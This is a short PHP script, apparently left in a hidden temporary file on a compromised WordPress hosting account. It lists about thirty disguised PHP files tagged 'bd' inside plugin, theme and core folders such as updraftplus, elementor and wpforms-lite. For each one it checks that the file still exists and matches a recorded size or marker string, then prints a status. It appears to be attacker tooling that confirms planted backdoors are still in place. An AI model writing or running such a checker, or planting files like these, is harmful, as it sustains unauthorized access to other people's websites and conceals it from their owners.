/home/sylamedg/.cagefs/tmp/.pointer
<?php   $r = '/home/sylamedg/public_html'; $x = ["/wp-content/plugins/all-in-one-seo-pack/app/Common/Schema/Graphs/Traits/popup_image.php"=>"bd@@243584017@@1734",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Binary/qformat_xml.php"=>"bd@@243608596@@559",
"/wp-content/plugins/my-wp-ab-testing/css/File_dm.php"=>"bd@@175045908@@805",
"/wp-content/plugins/unbounce/css/param.php"=>"bd@@175045909@@796",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Batch/Exception/preauth.php"=>"bd@@243582509@@651",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Http/QueryAggregator/xbutton.php"=>"bd@@243609147@@605",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/Data.php"=>"bd@@243608910@@2190",
"/wp-content/themes/news-brick-kit/File_dm.php"=>"bd@@175050067@@805",
"/wp-content/themes/siara-marketing-agency/assets/custom/js/param.php"=>"bd@@175050069@@796",
"/wp-content/themes/File_dm.php"=>"bd@@175053910@@805",
"/wp-content/plugins/all-in-one-seo-pack/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Lock.php"=>"bd@@243607148@@hub_center",
"/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Batch/shop.php"=>"bd@@243609748@@1562",
"/32next.php"=>"bd@@242527639@@1033",
"/fput.php"=>"bd@@242527645@@831",
"/param.php"=>"bd@@242356133@@601",
"/port.php"=>"bd@@242356134@@621",
"/wp-content/plugins/updraftplus/vendor/rackspace/php-opencloud/lib/OpenCloud/Common/register_result.php"=>"bd@@243609781@@1805",
"/wp-content/themes/twentytwentyfive/patterns/footer.php"=>"bd@@243581637@@publish_content",
"/wp-content/plugins/wpforms-lite/src/Admin/Base/Tables/Facades/rateimage.php"=>"bd@@243584198@@689",
"/wp-includes/rss-functions.php"=>"bd@@243580116@@dataflow_engine",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/Billing/abusereport.php"=>"bd@@243583452@@645",
"/wp-content/plugins/elementor/app/modules/import-export-customization/data/routes/traits/handles.quota.errors.php"=>"bd@@243583709@@592",
"/wp-content/plugins/updraftplus/central/classes/class-automatic-upgrader-skin.php"=>"bd@@243632607@@49",
"/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-4-col.php"=>"bd@@243634874@@78",
"/wp-content/plugins/premium-addons-for-elementor/modules/woocommerce/templates/product-2.php"=>"bd@@243635267@@18",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/core-interfaces/src/Core/Request/profileinfo.php"=>"bd@@243638538@@1939",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/Token/select_project.php"=>"bd@@243638686@@654",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/FinancialConnections/db_export.php"=>"bd@@243638929@@1673",
"/wp-content/plugins/all-in-one-seo-pack/vendor/psr/log/Psr/Log/cadlisp.php"=>"bd@@243639372@@2031",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/core-interfaces/src/Sdk/default_ftp.php"=>"bd@@243639624@@1862",
"/wp-content/plugins/convertpro/assets/css/cloud.php"=>"bd@@175045907@@602",
"/wp-content/themes/cloud.php"=>"bd@@175053908@@602"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');